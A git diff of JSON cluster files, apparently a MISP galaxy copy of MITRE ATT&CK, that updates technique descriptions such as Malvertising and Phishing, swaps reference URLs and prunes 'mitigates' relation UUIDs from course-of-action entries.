+ "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
"meta": {
"external_id": "T1583.004",
"kill_chain": [
@@ -28534,7 +28877,6 @@
"https://adsecurity.org/?p=2293",
"https://attack.mitre.org/techniques/T1558/003",
"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/",
- "https://capec.mitre.org/data/definitions/509.html",
"https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1",
"https://msdn.microsoft.com/library/ms677949.aspx",
"https://redsiege.com/kerberoast-slides",
@@ -28581,7 +28923,38 @@
"value": "Serverless - T1583.007"
},
{
- "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+ "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) \n\nMalvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) ",
+ "meta": {
+ "external_id": "T1583.008",
+ "kill_chain": [
+ "mitre-attack:resource-development"
+ ],
+ "mitre_data_sources": [
+ "Internet Scan: Response Content"
+ ],
+ "mitre_platforms": [
+ "PRE"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1583/008",
+ "https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e",
+ "https://www.bbc.com/news/technology-12891182",
+ "https://www.ic3.gov/Media/Y2022/PSA221221",
+ "https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/",
+ "https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0458aab9-ad42-4eac-9e22-706a95bafee2",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "155207c0-7f53-4f13-a06b-0a9907ef5096",
+ "value": "Malvertising - T1583.008"
+ },
+ {
+ "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.",
"meta": {
"external_id": "T1584.004",
"kill_chain": [
@@ -29141,7 +29514,6 @@
"refs": [
"http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf",
"https://attack.mitre.org/techniques/T1014",
- "https://capec.mitre.org/data/definitions/552.html",
"https://en.wikipedia.org/wiki/Rootkit",
"https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/",
"https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"
@@ -29324,7 +29696,6 @@
"refs": [
"http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf",
"https://attack.mitre.org/techniques/T1036",
- "https://capec.mitre.org/data/definitions/177.html",
"https://lolbas-project.github.io/",
"https://twitter.com/ItsReallyNick/status/1055321652777619457"
]
@@ -29893,7 +30264,7 @@
"value": "DNSCalc - T1324"
},
{
- "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.",
+ "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)",
"meta": {
"external_id": "T1566",
"kill_chain": [
@@ -29915,9 +30286,15 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1566",
- "https://capec.mitre.org/data/definitions/98.html",
+ "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends",
+ "https://blog.sygnia.co/luna-moth-false-subscription-scams",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
- "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"
+ "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
+ "https://www.proofpoint.com/us/threat-reference/email-spoofing"
]
},
"uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
@@ -29953,5 +30330,5 @@
"value": "Keychain - T1579"
}
],
- "version": 24
+ "version": 25
}
diff --git a/clusters/mitre-course-of-action.json b/clusters/mitre-course-of-action.json
index e78f3c3..9434f17 100644
--- a/clusters/mitre-course-of-action.json
+++ b/clusters/mitre-course-of-action.json
@@ -22,15 +22,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8b36d944-f274-4d46-9acd-dbba6927ce7a",
"value": "Registry Run Keys / Startup Folder Mitigation - T1060"
},
@@ -43,15 +35,7 @@
"https://attack.mitre.org/mitigations/T1041"
]
},
- "related": [
- {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "92c28497-2820-445e-9f3e-a03dd77dc0c8",
"value": "Exfiltration Over Command and Control Channel Mitigation - T1041"
},
@@ -65,15 +49,7 @@
"https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/"
]
},
- "related": [
- {
- "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a98be93b-a75b-4dd4-8a72-4dfd0b5e25bb",
"value": "Exfiltration Over Other Network Medium Mitigation - T1011"
},
@@ -100,13 +76,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"tags": [
@@ -135,13 +104,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -149,13 +111,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"tags": [
@@ -205,6 +160,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"tags": [
@@ -219,13 +181,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5",
"tags": [
@@ -275,13 +230,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -303,13 +251,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "79a47ad0-fc3b-4821-9f01-a026b1ddba21",
"tags": [
@@ -318,7 +259,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
+ "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -345,13 +286,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "808e6329-ca91-4b87-ac2d-8eadc5f8f327",
"tags": [
@@ -394,13 +328,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
"tags": [
@@ -429,20 +356,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8",
"tags": [
@@ -485,13 +398,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d376668f-b208-42de-b1f5-fdfe0ad4b753",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb",
"tags": [
@@ -555,27 +461,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
"tags": [
@@ -624,6 +509,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "19bf235b-8620-4997-b5b4-94e0659ed7c3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "28abec6c-4443-4b03-8206-07f2e264a6b4",
"tags": [
@@ -632,14 +524,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -673,20 +565,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
"tags": [
@@ -739,15 +617,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d9727aee-48b8-4fdb-89e2-4c49746ba4dd",
"value": "Data from Network Shared Drive Mitigation - T1039"
},
@@ -760,15 +630,7 @@
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"
]
},
- "related": [
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0bc3ce00-83bc-4a92-a042-79ffbc6af259",
"value": "Windows Management Instrumentation Event Subscription Mitigation - T1084"
},
@@ -781,15 +643,7 @@
"https://attack.mitre.org/mitigations/T1094"
]
},
- "related": [
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f3d0c735-330f-43c2-8e8e-51bcfa51e8c3",
"value": "Custom Command and Control Protocol Mitigation - T1094"
},
@@ -805,15 +659,7 @@
"https://attack.mitre.org/mitigations/T1183"
]
},
- "related": [
- {
- "dest-uuid": "62166220-e498-410f-a90a-19d4339d4e99",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "33f76731-b840-446f-bee0-53687dad24d9",
"value": "Image File Execution Options Injection Mitigation - T1183"
},
@@ -826,15 +672,7 @@
"https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
]
},
- "related": [
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ef273807-c465-4728-9cee-5823422f42ee",
"value": "SIP and Trust Provider Hijacking Mitigation - T1198"
},
@@ -847,15 +685,7 @@
"https://attack.mitre.org/mitigations/T1095"
]
},
- "related": [
- {
- "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "399d9038-b100-43ef-b28d-a5065106b935",
"value": "Standard Non-Application Layer Protocol Mitigation - T1095"
},
@@ -872,15 +702,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d01f473f-3cdc-4867-9e55-1de9cf1986f0",
"value": "Deobfuscate/Decode Files or Information Mitigation - T1140"
},
@@ -969,15 +791,7 @@
"https://attack.mitre.org/mitigations/T1030"
]
},
- "related": [
- {
- "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ba06d68a-4891-4eb5-b634-152e05ec60ee",
"value": "Data Transfer Size Limits Mitigation - T1030"
},
@@ -994,15 +808,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7ee0879d-ce4f-4f54-a96b-c532dfb98ffd",
"value": "Data from Local System Mitigation - T1005"
},
@@ -1019,15 +825,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "902286b2-96cc-4dd7-931f-e7340c9961da",
"value": "File System Logical Offsets Mitigation - T1006"
},
@@ -1051,29 +849,7 @@
"https://attack.mitre.org/mitigations/T1070"
]
},
- "related": [
- {
- "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "6cac62ce-550b-4793-8ee6-6a1b8836edb0",
"value": "Indicator Removal on Host Mitigation - T1070"
},
@@ -1088,15 +864,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "14b63e6b-7531-4476-9e60-02cc5db48b62",
"value": "Exploitation of Remote Services Mitigation - T1210"
},
@@ -1113,15 +881,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "684feec3-f9ba-4049-9d8f-52d52f3e0e40",
"value": "System Network Configuration Discovery Mitigation - T1016"
},
@@ -1140,15 +900,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "effb83a0-ead1-4b36-b7f6-b7bdf9c4616e",
"value": "Replication Through Removable Media Mitigation - T1091"
},
@@ -1161,13 +913,6 @@
]
},
"related": [
- {
- "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
"tags": [
@@ -1182,13 +927,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0c2d00da-7742-49e7-9928-4514e5075d32",
"tags": [
@@ -1203,13 +941,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -1252,13 +983,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
"tags": [
@@ -1266,13 +990,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3298ce88-1628-43b1-87d9-0b5336b193d7",
"tags": [
@@ -1371,13 +1088,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "58af3705-8740-4c68-9329-ec015a7013c2",
"tags": [
@@ -1420,13 +1130,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -1434,20 +1137,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
"tags": [
@@ -1462,13 +1151,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
"tags": [
@@ -1477,14 +1159,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -1497,13 +1172,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
"tags": [
@@ -1525,13 +1193,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2",
"tags": [
@@ -1539,13 +1200,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
"tags": [
@@ -1567,20 +1221,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c63a348e-ffc2-486a-b9d9-d7f11ec54d99",
"tags": [
@@ -1588,13 +1228,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
"tags": [
@@ -1623,13 +1256,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dca670cf-eeec-438f-8185-fd959d9ef211",
"tags": [
@@ -1637,13 +1263,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
"tags": [
@@ -1672,20 +1291,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
@@ -1716,15 +1321,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
